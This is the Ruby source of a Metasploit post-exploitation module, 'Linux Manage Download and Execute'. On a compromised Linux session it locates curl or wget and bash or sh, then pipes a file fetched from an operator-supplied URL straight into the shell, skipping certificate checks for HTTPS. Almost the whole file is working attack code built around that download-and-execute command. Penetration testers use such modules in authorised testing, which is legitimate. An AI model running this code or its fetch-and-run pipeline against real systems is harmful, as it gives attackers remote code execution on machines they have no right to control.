1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Linux::System
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Linux Manage Download and Execute',
15
        'Description' => %q{
16
          This module downloads and runs a file with bash. It first tries to use curl as
17
          its HTTP client and then wget if it's not found. Bash found in the PATH is used
18
          to execute the file.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Joshua D. Abraham <jabra[at]praetorian.com>',
23
        ],
24
        'Platform' => ['linux'],
25
        'SessionTypes' => ['shell', 'meterpreter'],
26
        'Notes' => {
27
          'Stability' => [CRASH_SAFE],
28
          'Reliability' => [],
29
          'SideEffects' => [ARTIFACTS_ON_DISK]
30
        }
31
      )
32
    )
33

34
    register_options(
35
      [
36
        OptString.new('URL', [true, 'Full URL of file to download.'])
37
      ]
38
    )
39
  end
40

41
  def cmd_exec_vprint(cmd)
42
    vprint_status("Executing: #{cmd}")
43
    output = cmd_exec(cmd)
44
    if !output.empty?
45
      vprint_status(output.to_s)
46
    end
47
  end
48

49
  def exists_exe?(exe)
50
    vprint_status "Searching for #{exe} in the current $PATH..."
51
    path = get_env('PATH')
52
    if path.nil? || path.empty?
53
      vprint_error('No local $PATH set!')
54
      return false
55
    end
56

57
    vprint_status("$PATH is #{path.strip!}")
58

59
    path.split(':').each do |p|
60
      full_path = p + '/' + exe
61
      vprint_status "Searching for '#{full_path}' ..."
62
      return true if file_exist?(full_path)
63
    end
64

65
    return false
66
  end
67

68
  def search_http_client
69
    print_status('Checking if curl exists in the path...')
70
    if exists_exe?('curl')
71
      print_good('curl available, using it')
72
      @stdout_option = ''
73
      @http_client = 'curl'
74
      @ssl_option = '-k'
75
      return
76
    end
77

78
    print_status('Checking if wget exists in the path...')
79
    if exists_exe?('wget')
80
      print_good('wget available, using it')
81
      @http_client = 'wget'
82
      @stdout_option = '-O-'
83
      @ssl_option = '--no-check-certificate'
84
      return
85
    end
86
  end
87

88
  def search_shell
89
    print_status('Checking if bash exists in the path...')
90
    if exists_exe?('bash')
91
      print_good('bash available, using it')
92
      @shell = 'bash'
93
      return
94
    end
95

96
    print_status('Checking if sh exists in the path...')
97
    if exists_exe?('sh')
98
      print_good('sh available, using it')
99
      @shell = 'sh'
100
      return
101
    end
102
  end
103

104
  def run
105
    search_http_client
106

107
    if !@http_client
108
      print_warning('neither curl nor wget available in the $PATH, aborting...')
109
      return
110
    end
111

112
    search_shell
113

114
    if !@shell
115
      print_warning('neither bash nor sh available in the $PATH, aborting...')
116
      return
117
    end
118

119
    if datastore['URL'].match(%r{^https://})
120
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{@ssl_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
121
    else
122
      cmd_exec_vprint("#{@http_client} #{@stdout_option} #{datastore['URL']} 2>/dev/null | #{@shell}")
123
    end
124
  end
125
end
126

127